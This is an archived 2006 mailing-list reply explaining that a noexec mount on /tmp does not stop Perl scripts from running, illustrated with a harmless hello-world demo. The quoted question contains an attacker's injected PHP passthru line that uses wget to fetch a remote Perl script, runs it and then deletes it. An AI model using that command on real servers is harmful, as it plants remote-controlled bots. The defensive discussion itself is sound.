Index: [Article Count Order] [Thread]

Date:  Tue, 12 Sep 2006 15:15:12 -0400
From:  Kevin Bonner <keb (at mark) pa.net>
Subject:  [coba-e:06866] Re: /TMP Directory
To:  coba-e (at mark) bluequartz.org
Message-Id:  <200609121515.16088.keb (at mark) pa.net>
In-Reply-To:  <002701c6d450$c0c58480$6400a8c0@YOUR4105E587B6>
References:  <002701c6d450$c0c58480$6400a8c0@YOUR4105E587B6>
X-Mail-Count: 06866

On Saturday 09 September 2006 16:44, Darrell D. Mobley wrote:>  passthru('cd /tmp;wget http://perqafohu.com/~armendibx/oki/v6.txt;perl> v6.txt;rm -f v6*');> [::snip::]> The v6.txt is a Perl script that installs some IRC software and monitors> IRC on open ports.  I do not think the script was successful in running,> but I just want to make sure the /TMP security is enabled where files can='t> be run there.  While I don't think the DDOS attack was successful in> running the script, it was successful in shutting down the serer due to> MySQL becoming overwhelmed.  Server load was up to 156!>> Any suggestions would be appreciated.Having /tmp flags of noexec,nosuid helps against the clueless script kiddie=s, but in your case it wouldn't prevent the code in v6.txt from being executed.One example:[root tmp]# mount | grep /tmp/home/dev/tmpMnt on /home/tmp type ext2 (rw,noexec,nosuid,loop=/dev/loop0)[root tmp]# pwd/home/tmp[root tmp]# ls -l hi.pl-rw-r--r--    1 root     root           40 Sep 12 15:02 hi.pl[root tmp]# cat hi.pl#!/usr/bin/perlprint "Hello World!\n";[root tmp]# perl hi.plHello World![root tmp]#My /tmp has noexec and yet I'm still able to execute the perl script.  This= is because the perl program is being executed (from /usr/bin/perl) and it's interpreting the commands in the hi.pl file.  If I were to make hi.pl executable and try to execute that file directly, it would be denied.[root tmp]# chmod 755 hi.pl[root tmp]# ls -l hi.pl-rwxr-xr-x    1 root     root           40 Sep 12 15:02 hi.pl[root tmp]# ./hi.plsh: ./hi.pl: Permission denied[root tmp]#Hopefully this helps you understand a little more about the capabilities an=d limitations of the noexec flag on a mounted partition.Kevin Bonner
attatchment (application/pgp-signature) ignored